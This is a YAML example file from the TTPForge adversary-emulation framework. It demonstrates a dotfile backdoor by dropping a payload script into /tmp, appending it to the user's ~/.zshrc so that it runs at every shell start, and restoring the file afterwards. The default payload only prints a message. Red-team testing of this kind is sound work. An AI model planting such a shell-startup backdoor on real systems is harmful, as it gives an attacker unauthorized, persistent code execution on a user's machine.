github.com/facebookincubator/ttpforge@v1.0.13-0.20240405153150-5ae801628835/example-ttps/introduction/dotfile-backdoor-demo.yaml

github.com/facebookincubator/ttpforge@v1.0.13-0.20240405153150-5ae801628835/example-ttps/introduction/dotfile-backdoor-demo.yaml (about)

     1  ---
     2  api_version: 2.0
     3  uuid: 4fdffbb9-714a-4489-b7c7-1af99d213681
     4  name: dotfile_backdoor
     5  description: |
     6    This TTP demonstrates the core features of TTPForge:
     7      - Various Attacker Actions Implemented as Executable YAML
     8      - Simple but powerful Command-line Argument Support
     9      - Last-in-First-Out Cleanup Execution
    10      - Checking Conditions at Runtime to Avoid Errors
    11  tests:
    12    - name: default
    13      description: dry run with the default settings
    14      dry_run: true
    15  args:
    16    - name: target_file_path
    17      type: path
    18      description: The file that we should try to backdoor
    19      default: ~/.zshrc
    20    - name: payload_file_path
    21      type: path
    22      description: |
    23        The path to which we should write the payload file.
    24        The backdoor we insert into the target file will reference this
    25        payload.
    26      default: /tmp/ttpforge-dotfile-backdoor-demo-payload.sh
    27    - name: payload_cmd
    28      description: |
    29        The shell command that our payload should execute
    30      default: echo 'Hello from TTPForge! You have been pwned!'
    31    - name: backup_file_path
    32      type: path
    33      description: |
    34        The file path to which the target file should be backed up
    35      default: /tmp/ttpforge-dotfile-backdoor-backup
    36  steps:
    37    - name: verify_dotfile_exists
    38      description: |
    39        Uses the `checks:` feature to verify that the target file
    40        actually exists before we try to write to it
    41      print_str: |
    42        Verifying that {{.Args.target_file_path}} exists...
    43      checks:
    44        - path_exists: {{.Args.target_file_path}}
    45          msg: "Target file {{.Args.target_file_path}} must exist"
    46    - name: create_payload_file
    47      description: |
    48        This step uses the `create_file:` action to drop our payload to disk
    49      create_file: {{.Args.payload_file_path}}
    50      contents: |
    51        #!/bin/bash
    52        # Created by TTPForge
    53        {{.Args.payload_cmd}}
    54      mode: 0755
    55      cleanup: default
    56    - name: backdoor_target_file
    57      edit_file: {{.Args.target_file_path}}
    58      backup_file: {{.Args.backup_file_path}}
    59      edits:
    60        - append: |
    61            # ADDED BY TTPFORGE - SHOULD BE CLEANED UP AUTOMATICALLY
    62            # BUT IF NOT YOU CAN DELETE THIS :)
    63            {{.Args.payload_file_path}}
    64      cleanup:
    65        inline: |
    66          cp {{.Args.backup_file_path}} {{.Args.target_file_path}}